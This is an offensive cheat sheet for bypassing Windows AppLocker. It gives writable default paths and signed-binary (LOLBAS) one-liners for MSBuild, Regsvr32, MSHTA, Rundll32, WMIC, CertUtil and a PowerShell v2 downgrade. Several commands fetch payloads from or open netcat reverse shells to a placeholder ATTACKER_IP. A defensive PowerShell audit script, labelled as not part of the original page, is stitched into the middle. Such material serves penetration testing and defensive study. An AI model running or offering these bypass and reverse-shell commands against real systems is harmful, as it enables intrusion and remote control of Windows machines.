Check AppLocker Policy

Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2"

Check if Enforced

Get-AppLockerPolicy -Effective -Xml | Select-String "EnforcementMode"
Mode            Meaning
NotConfigured   Not active
AuditOnly       Logs but doesn't block
Enabled         Actively blocking

Default Writable Paths

AppLocker default rules allow execution from these paths:
C:\Windows\Tasks\
C:\Windows\Temp\
C:\Windows\tracing\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\FxsTmp\
C:\Windows\System32\com\dmp\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\
C:\Windows\SysWOW64\FxsTmp\
C:\Windows\SysWOW64\com\dmp\
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\

Find Writable + Executable Paths

Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\Tasks\test.exe -User Everyone
icacls C:\Windows\Tasks
icacls C:\Windows\Temp
icacls C:\Windows\tracing
Copy payload to writable path and execute.
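As an added example (not part of the original page), the following PowerShell combines the icacls and Test-AppLockerPolicy checks above into a single audit report over the default-rule directories, so that each directory that is both user-writable and allowed by the effective policy can be closed with an explicit deny rule. It assumes the AppLocker module is available and, as with the page's own check, that the probe file path does not need to exist for path-rule evaluation.

```powershell
# Added example, not from the original page: report which AppLocker default-rule
# directories are both writable by low-privilege users and allowed by the
# effective policy. Assumes the AppLocker module; run in an elevated session.
Import-Module AppLocker

$defaultDirs = @(
    'C:\Windows\Tasks', 'C:\Windows\Temp', 'C:\Windows\tracing',
    'C:\Windows\Registration\CRMLog',
    'C:\Windows\System32\FxsTmp', 'C:\Windows\System32\com\dmp',
    'C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys',
    'C:\Windows\System32\spool\drivers\color',
    'C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter',
    'C:\Windows\SysWOW64\FxsTmp', 'C:\Windows\SysWOW64\com\dmp',
    'C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter'
)

# Principals every standard user is a member of.
$lowPriv = @('Everyone', 'BUILTIN\Users',
             'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# CreateFiles/WriteData (0x2) and CreateDirectories/AppendData (0x4).
$createMask = 0x6

$policy = Get-AppLockerPolicy -Effective

foreach ($dir in $defaultDirs) {
    if (-not (Test-Path -LiteralPath $dir)) { continue }

    # Allow ACEs that let a low-privilege principal create files or folders here.
    $writers = (Get-Acl -LiteralPath $dir).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $createMask) -ne 0
    }

    # Probe file name is constructed; it does not need to exist for path rules.
    $probe  = Join-Path $dir 'applocker-audit-probe.exe'
    $result = $policy | Test-AppLockerPolicy -Path $probe -User Everyone
    $allowed = ($result.PolicyDecision -in @('Allowed', 'AllowedByDefault'))

    [pscustomobject]@{
        Directory    = $dir
        WritableBy   = ($writers.IdentityReference.Value | Sort-Object -Unique) -join ', '
        Decision     = $result.PolicyDecision
        MatchingRule = $result.MatchingRule
        Gap          = ([bool]$writers -and $allowed)   # writable AND allowed
    }
}
```

Rows with Gap = True are the directories to cover with a deny rule (or a tightened ACL); a directory inheriting only generic rights from its parent is not decoded by the mask and should be checked by hand.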

LOLBAS (Living Off the Land)

Signed Microsoft binaries that can execute code.
https://lolbas-project.github.io/

MSBuild

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
payload.xml:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <Exec Command="cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"/>
  </Target>
</Project>

InstallUtil

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

Regsvr32

regsvr32 /s /n /u /i:http://ATTACKER_IP/payload.sct scrobj.dll

MSHTA

mshta http://ATTACKER_IP/payload.hta
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd /c whoami"", 0:close")

Rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").Run("cmd /c whoami")

WMIC

wmic process call create "cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"

CertUtil

certutil -urlcache -split -f http://ATTACKER_IP/shell.exe C:\Windows\Tasks\shell.exe
C:\Windows\Tasks\shell.exe

Alternate Execution Methods

PowerShell Constrained Language Mode Bypass

Check mode:
$ExecutionContext.SessionState.LanguageMode
If ConstrainedLanguage:
# PowerShell v2 (if available)
powershell -version 2 -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

DLL Execution

AppLocker may not block DLLs (not enabled by default):
rundll32.exe shell.dll,EntryPoint

Script Rules Bypass

If only .ps1 is blocked, use .bat or .vbs:
cscript payload.vbs
wscript payload.js

Quick Reference

Technique       Binary
MSBuild         Microsoft.NET\...\MSBuild.exe
InstallUtil     Microsoft.NET\...\InstallUtil.exe
Regsvr32        regsvr32.exe
MSHTA           mshta.exe
Rundll32        rundll32.exe
WMIC            wmic.exe
CertUtil        certutil.exe
Writable paths  C:\Windows\Tasks\, C:\Windows\Temp\